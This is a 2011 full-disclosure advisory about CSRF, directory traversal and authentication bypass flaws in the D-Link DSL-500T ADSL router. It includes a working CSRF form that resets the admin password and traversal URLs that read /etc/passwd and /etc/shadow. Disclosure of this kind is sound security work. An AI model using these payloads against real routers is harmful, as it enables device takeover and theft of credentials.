Date: Tue, 20 Dec 2011 01:28:21 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: CSRF,
	DT and AB vulnerabilities in D-Link DSL-500T ADSL Router

Hello list!

I want to warn you about new security vulnerabilities in D-Link DSL-500T
ADSL Router.

These are Cross-Site Request Forgery, Directory Traversal and Authentication
Bypass vulnerabilities. This is my fifth advisory (#3 and #4 were announced
and will be disclosed later, after giving the time for D-Link to fix those
vulnerabilities) from series of advisories about vulnerabilities in D-Link
products.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DSL-500T, Firmware
V1.00B02T02.RU.20050223. This model with other firmware versions is also
vulnerable, and also other models of routers from D-Link can be vulnerable.

----------
Details:
----------

CSRF (WASC-09):

All functionality of admin panel of the router has CSRF vulnerabilities. For
example, the next CSRF-request allows to change login and password of
administrator.

D-Link DSL-500T CSRF.html

<head>
<title>D-Link DSL-500T CSRF exploit (C) 2011 MustLive.
http://websecurity.com.ua</title>
</head>
<form name="hack" action="http://192.168.1.1/cgi-bin/webcm" method="post"
enctype="application/x-www-form-urlencoded">
<input type="hidden" name="getpage" value="../html/tools/usrmgmt.htm">
<input type="hidden" name="security:settings/username" value="admin">
<input type="hidden" name="security:settings/password" value="password">
<input type="hidden" name="security:settings/password_confirm"
value="password">
<input type="hidden" name="security:settings/idle_timeout" value="30">
</form>

All other functions in admin panel are also vulnerable to CSRF. And if to
use XSS and DT, then it'll be possible to remotely read arbitrary files from
the router.

Directory Traversal (WASC-33):

In 2006 in other models of D-Link's routers DT vulnerability was found
(CVE-2006-2337). It also exists in this model, as I've checked (but as
opposed to the description of DT in other models, in my model the
authentication is required).

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/passwd
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

It's possible to read arbitrary files from the router. But this
vulnerability works only after authentication.

Authentication Bypass (WASC-01):

In 2005 in other models of D-Link's routers AB vulnerability was found
(CVE-2005-1680). It also exists in this model, as I've checked.

It's possible to send commands to application firmwarecfg without
authentication. Which allows e.g. to receive configuration file with login
and password of administrator. For getting access to admin panel.

Timeline:

2011.12.17 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5581/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site